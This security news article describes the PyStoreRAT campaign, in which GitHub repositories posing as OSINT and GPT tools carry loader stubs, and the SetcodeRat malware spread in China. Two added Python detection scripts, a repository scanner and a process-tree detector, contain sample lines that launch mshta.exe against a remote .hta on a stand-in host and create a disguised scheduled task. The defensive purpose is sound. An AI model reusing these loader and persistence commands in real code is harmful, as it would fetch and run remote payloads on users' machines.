PyStoreRAT Malware Campaign Exploits GitHub Repos for OSINT and GPT Utilities

Key Takeaways

  • A new campaign is using GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based remote access trojan (RAT) dubbed PyStoreRAT.
  • PyStoreRAT is a modular, multi-stage implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript and HTA modules, and it deploys the Rhadamanthys information stealer as a follow-on payload.
  • The loader is a short Python or JavaScript stub embedded in GitHub repositories that pose as OSINT tools, DeFi bots, GPT wrappers and security-themed utilities.
  • The operators promote the repositories on social media and artificially inflate their star and fork counts to make them look legitimate.
  • A separate new RAT codenamed SetcodeRat is being spread in China through malvertising lures and has infected hundreds of computers, including government and enterprise machines.

Introduction to PyStoreRAT
Cybersecurity researchers have identified a campaign that uses GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based remote access trojan (RAT) dubbed PyStoreRAT. The repositories, typically themed as development utilities or OSINT tools, contain only a few lines of code whose sole purpose is to silently download a remote HTA file and execute it via "mshta.exe". The implant has been described as "modular, multi-stage": it can execute EXE, DLL, PowerShell, MSI, Python, JavaScript and HTA modules.

Distribution and Infection Chain
PyStoreRAT is distributed through Python or JavaScript loader stubs embedded in GitHub repositories that masquerade as OSINT tools, DeFi bots, GPT wrappers and security-themed utilities. The repositories are promoted on platforms such as YouTube and X, and the operators artificially inflate their star and fork counts so they appear legitimate. When a victim runs the loader stub, it fetches and executes a remote HTML Application (HTA) payload that delivers PyStoreRAT. The malware then profiles the host, checks whether it is running with administrator privileges, and scans for cryptocurrency wallet-related files.
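Because the loader is only a few lines of code, the cheapest defence is to read a repository before running it. The Python script below, added here as an illustration and not taken from the article or from the researchers who documented the campaign, scans a checkout for the hallmarks described above: an mshta.exe invocation, a remote .hta URL, a cmd.exe /c proxy, a shell-execution call, the "Falcon" and "Reason" antivirus-name strings, and a schtasks call. The sample repository contents, the rule weights, the alert threshold and the assumption that persistence is created with schtasks are all this example's own.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed stand-in for a cloned repository (relative path -> file contents).
# The snippets are written for this example; they are not the campaign's actual stubs.
SAMPLE_REPO: Dict[str, str] = {
    "osint_tool/main.py": (
        "import subprocess\n"
        "def run():\n"
        "    subprocess.Popen('cmd.exe /c mshta.exe https://example.invalid/update.hta', shell=True)\n"
    ),
    "gpt_wrapper/index.js": (
        "const { exec } = require('child_process');\n"
        "exec('mshta https://example.invalid/x.hta');\n"
    ),
    "clean_tool/util.py": "def add(a, b):\n    return a + b\n",
}

# (rule name, weight, pattern). Weights and THRESHOLD are this example's own heuristic.
RULES = [
    ("mshta_invocation", 3, re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)),
    ("remote_hta_url", 3, re.compile(r"""https?://[^\s'"]+\.hta\b""", re.IGNORECASE)),
    ("cmd_proxy_exec", 1, re.compile(r"\bcmd(?:\.exe)?\s+/c\b", re.IGNORECASE)),
    ("shell_exec_call", 1, re.compile(
        r"\b(?:subprocess\.(?:Popen|run|call)|os\.system|child_process|exec(?:Sync)?)\b")),
    ("av_name_probe", 2, re.compile(r"\b(?:Falcon|Reason)\b")),   # strings named in the report
    ("scheduled_task", 2, re.compile(r"\bschtasks(?:\.exe)?\b", re.IGNORECASE)),  # assumed method
]
THRESHOLD = 5


def scan_source(text: str) -> List[str]:
    """Names of the rules that fire on one file's contents, in RULES order."""
    return [name for name, _, pattern in RULES if pattern.search(text)]


def score(hits: List[str]) -> int:
    """Weighted sum of the rules that fired."""
    weights = {name: weight for name, weight, _ in RULES}
    return sum(weights[h] for h in hits)


def scan_repo(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each file that triggers at least one rule to its hits."""
    report: Dict[str, List[str]] = {}
    for path, text in files.items():
        hits = scan_source(text)
        if hits:
            report[path] = hits
    return report


def suspicious(files: Dict[str, str]) -> List[str]:
    """Files whose weighted score reaches THRESHOLD, sorted by path."""
    return sorted(p for p, hits in scan_repo(files).items() if score(hits) >= THRESHOLD)


def scan_directory(root: str, suffixes=(".py", ".js")) -> Dict[str, List[str]]:
    """Same scan over a real checkout on disk."""
    files: Dict[str, str] = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            files[str(path)] = path.read_text(errors="ignore")
    return scan_repo(files)


if __name__ == "__main__":
    for path, hits in scan_repo(SAMPLE_REPO).items():
        print(f"{path}: score={score(hits)} hits={hits}")
    print("flagged:", suspicious(SAMPLE_REPO))
```

Treat this as a triage aid, not a verdict: base64-encoded or string-split stubs defeat plain regexes, so a tiny repository whose only real logic is a shell-execution call deserves a manual read regardless of its score, and anything you still intend to run belongs in a disposable VM first.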

PyStoreRAT Capabilities and Evasion Techniques
PyStoreRAT can execute EXE, DLL, PowerShell, MSI, Python, JavaScript and HTA modules, and it deploys the Rhadamanthys information stealer as a follow-on payload. To evade detection, the loader stub enumerates the installed antivirus products and looks for names containing "Falcon" (CrowdStrike Falcon) or "Reason" (Cybereason or ReasonLabs). If either is present, it launches "mshta.exe" through "cmd.exe" rather than directly, to reduce its visibility to the endpoint agent. For persistence, the malware creates a scheduled task disguised as an NVIDIA app self-update.
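The behaviour above leaves a recognisable process tree: a scripting interpreter spawns cmd.exe, which spawns mshta.exe with a URL on its command line, and schtasks.exe later creates a task with an NVIDIA-themed name whose action lives outside NVIDIA's install directory. The Python detection logic below, added here as an example and not taken from the article or from any vendor's rule set, runs those checks over constructed Sysmon-style process-creation events. The field names, the list of script hosts, the pid/ppid values and the assumption that legitimate NVIDIA updaters live under C:\Program Files\NVIDIA Corporation\ are this example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon Event ID 1-style process-creation events (not real telemetry).
# pid/ppid link each process to its parent so the ancestry can be walked.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "C:\\Python312\\python.exe", "cmd": "python.exe main.py"},
    {"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "cmd.exe /c mshta.exe https://example.invalid/update.hta"},
    {"pid": 400, "ppid": 300, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/update.hta"},
    {"pid": 500, "ppid": 400, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmd": 'schtasks.exe /create /tn "NVIDIA App Self Update" '
            '/tr "C:\\Users\\u\\AppData\\Roaming\\nvapp\\update.exe" /sc minute /mo 5'},
    # Benign control: a user opening a local .hta straight from Explorer.
    {"pid": 600, "ppid": 100, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmd": "mshta.exe C:\\Tools\\dashboard.hta"},
]

SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "node.exe"}        # assumed loader interpreters
LEGIT_NVIDIA_PREFIX = "c:\\program files\\nvidia corporation\\"  # assumed vendor install path
URL_RE = re.compile(r"https?://", re.IGNORECASE)
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)


def basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def switch_value(cmd: str, switch: str) -> str:
    """Return the quoted or bare argument following a schtasks switch such as /tn."""
    m = re.search(re.escape(switch) + r'\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def ancestor_images(pid: int, by_pid: Dict[int, Dict]) -> List[str]:
    """Walk ppid links upward and return ancestor image basenames, nearest first."""
    names: List[str] = []
    seen = set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        names.append(basename(ev["image"]))
    return names


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) alerts for the loader tradecraft described in the text."""
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Tuple[str, int]] = []
    for e in events:
        name, cmd = basename(e["image"]), e["cmd"]
        if name == "cmd.exe" and MSHTA_RE.search(cmd):
            # cmd.exe used purely as a proxy to reach mshta.exe
            alerts.append(("cmd_proxy_to_mshta", e["pid"]))
        elif name == "mshta.exe":
            if URL_RE.search(cmd):                      # remote HTA rather than a local file
                alerts.append(("mshta_remote_hta", e["pid"]))
            if SCRIPT_HOSTS & set(ancestor_images(e["pid"], by_pid)):
                alerts.append(("mshta_from_script_host", e["pid"]))
        elif name == "schtasks.exe" and "/create" in cmd.lower():
            task_name = switch_value(cmd, "/tn").lower()
            action = switch_value(cmd, "/tr").lower()
            if "nvidia" in task_name and not action.startswith(LEGIT_NVIDIA_PREFIX):
                alerts.append(("nvidia_lookalike_task", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The ancestry walk is what separates this from a plain command-line match: the AV-aware variant of the stub puts cmd.exe between the interpreter and mshta.exe, so a rule keyed only on the immediate parent would miss it, while "mshta.exe launched with a URL" and "mshta.exe with a script interpreter anywhere in its ancestry" catch both the direct and the proxied path. The benign local .hta launch from Explorer produces no alert.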

SetcodeRat: A New RAT in China
In addition to PyStoreRAT, a new RAT codenamed SetcodeRat is being spread in China via malvertising lures. It is disguised as a legitimate installer for popular programs such as Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China, Hong Kong, Macao or Taiwan. SetcodeRat can connect to Telegram or to a conventional command-and-control (C2) server to retrieve instructions and carry out data theft. Its command set lets the operators take screenshots, log keystrokes, read and set folders, start processes, run "cmd.exe", open socket connections, collect system and network-connection information, and update the implant to a new version.

Conclusion and Implications
The discovery of PyStoreRAT and SetcodeRat shows how remote access trojans and their distribution tactics keep evolving. Seeding malicious tools through GitHub-hosted repositories and social-media promotion is a concerning trend because it exploits the trust users place in those platforms, and inflated star and fork counts remove one of the few signals a casual user has for judging a project. PyStoreRAT's modular, multi-stage design, together with a loader that checks for specific endpoint security products before deciding how to launch "mshta.exe", shows operators actively tuning for detection evasion. As the threat landscape continues to evolve, researchers and defenders need to stay vigilant and build effective countermeasures to detect and mitigate these threats.
